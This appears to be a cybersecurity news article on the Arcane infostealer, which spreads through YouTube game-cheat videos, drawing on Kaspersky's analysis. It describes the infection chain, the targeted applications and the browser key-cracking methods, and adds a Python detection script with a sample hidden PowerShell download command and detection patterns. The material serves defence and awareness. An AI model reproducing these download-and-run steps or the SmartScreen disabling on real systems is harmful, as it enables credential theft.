Arcane Stealer Malware Spread via YouTube Game Cheat Videos
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
A new cybersecurity threat has surfaced, leveraging YouTube videos that promote game cheats to distribute a previously undocumented information-stealing malware known as Arcane. This campaign appears to be primarily targeting Russian-speaking users, and according to cybersecurity firm Kaspersky, it demonstrates a concerning level of sophistication in both execution and data collection.
Attack Chain Breakdown
The delivery method of the Arcane stealer is deceptively simple but highly effective. Threat actors upload YouTube videos advertising downloadable game cheats. These videos include links to password-protected archive files, which users are encouraged to download.
Once the archive is opened, it contains a batch script named start.bat, which runs a PowerShell command to retrieve a second compressed archive containing two key executables. The same batch script also disables Windows SmartScreen protection and modifies SmartScreen filter exceptions across drive root folders.
Dual Payload Delivery
The downloaded archive includes two binaries:
A cryptocurrency miner that hijacks system resources.
A stealer malware, originally a variant known as VGS (linked to the Phemedrone Stealer family). As of November 2024, this payload has been replaced with Arcane, a new and notably extensive data-harvesting tool.
Arcane’s Capabilities
Arcane's distinguishing feature is the sheer volume and variety of data it collects. According to Kaspersky's analysis, Arcane steals login credentials, passwords, cookies, credit card information, and much more from both system files and installed applications. It targets:
Browsers
Chromium-based (e.g., Chrome, Brave)
Gecko-based (e.g., Firefox)
VPN Clients
OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, ProtonVPN, hidemy.name, PIA, CyberGhost, ExpressVPN
Network Utilities
ngrok, Playit, Cyberduck, FileZilla, DynDNS
Messaging Applications
ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
Email Clients
Microsoft Outlook
Gaming Platforms
Riot Client, Epic Games, Steam, Ubisoft Connect, Roblox, Battle.net, Minecraft variants
Cryptocurrency Wallets
Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
In addition to application-specific data, Arcane can:
Take screenshots of the desktop
Enumerate running processes
List Wi-Fi networks and stored passwords
Extract browser encryption keys
Cracking Browser Encryption
A particularly advanced aspect of Arcane is its use of the Windows Data Protection API (DPAPI) to access encrypted browser data such as saved logins and cookies. Arcane goes further by dropping a utility named Xaitax to disk and executing it silently on the infected machine. Xaitax cracks the browser encryption keys, and Arcane reads the recovered key from the utility's console output, which makes the process more reliable and harder to detect than calling DPAPI from the stealer itself.
Furthermore, Arcane can launch a Chromium-based browser with its remote debugging port enabled and retrieve cookies through that debugging interface, an independent route that bypasses some traditional security mechanisms.
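As an added illustration (not code from the article or from Kaspersky's report), the following Python sketch runs a few constructed process and registry events through detection logic for three behaviours described in the attack-chain and cookie-extraction sections above: a batch script spawning a PowerShell download, SmartScreen being switched off through its policy or Explorer registry value, and a Chromium-based browser started with a remote-debugging port by a non-browser parent. The event shape, file names and URL are assumptions.

```python
import re

# Constructed sample telemetry (not from the article): minimal Sysmon-like
# process-creation and registry-set records. Paths and URL are made up.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\start.bat"',
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://example.invalid/p.zip -OutFile $env:TEMP\p.zip"'},
    {"type": "registry",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System\EnableSmartScreen",
     "value": "0"},
    {"type": "process",
     "parent": r"C:\Users\u\AppData\Local\Temp\payload.exe",
     "parent_cmdline": "payload.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --remote-debugging-port=9222"},
    {"type": "process",  # benign user launch, must not alert
     "parent": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
]

# PowerShell download primitives worth flagging when the parent is a .bat file.
DOWNLOAD_CMDLETS = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|start-bitstransfer)",
    re.I)
# Real SmartScreen registry values: the policy DWORD and the Explorer string value.
SMARTSCREEN_KEYS = re.compile(r"\\(EnableSmartScreen|SmartScreenEnabled)$", re.I)
BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe")

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def detect(events):
    """Return (rule_name, evidence) tuples for events matching the three behaviours."""
    alerts = []
    for e in events:
        if e["type"] == "process":
            img, parent = basename(e["image"]), basename(e["parent"])
            if img == "powershell.exe" and ".bat" in e.get("parent_cmdline", "").lower() \
                    and DOWNLOAD_CMDLETS.search(e["cmdline"]):
                alerts.append(("batch_powershell_download", e["cmdline"]))
            if img in BROWSERS and "--remote-debugging-port" in e["cmdline"].lower() \
                    and parent not in BROWSERS and parent != "explorer.exe":
                alerts.append(("browser_remote_debug_unusual_parent", e["cmdline"]))
        elif e["type"] == "registry" and SMARTSCREEN_KEYS.search(e["key"]) \
                and e["value"].lower() in ("0", "off"):
            alerts.append(("smartscreen_disabled", e["key"]))
    return alerts

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

In a real deployment the same three rules map onto Sysmon event IDs 1 (process creation) and 13 (registry value set), or their EDR equivalents.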
Emerging Loader Threat: ArcanaLoader
In a further evolution of the campaign, the attackers have introduced a new component: ArcanaLoader. Masquerading as a tool for downloading game cheats, ArcanaLoader instead serves as a delivery mechanism for the Arcane stealer.
Kaspersky researchers note that the campaign’s geographic focus is on Russia, Belarus, and Kazakhstan, though similar techniques could easily spread to a wider audience.
Key Takeaways
This campaign illustrates several important points about modern cyber threats:
Cybercriminals are highly adaptive, constantly changing their distribution tactics and payloads.
YouTube, a trusted platform for millions, is being manipulated to serve malicious files under the guise of harmless content.
Arcane is particularly dangerous because of its broad targeting scope, from communication tools and crypto wallets to gaming services and system credentials.
Final Thoughts
The Arcane stealer demonstrates the growing complexity of malware campaigns and the ingenuity of threat actors in blending social engineering with technical sophistication. Users are advised to avoid downloading files from untrusted sources, especially those promising game cheats or similar tools, and to keep all antivirus and endpoint protection software up to date.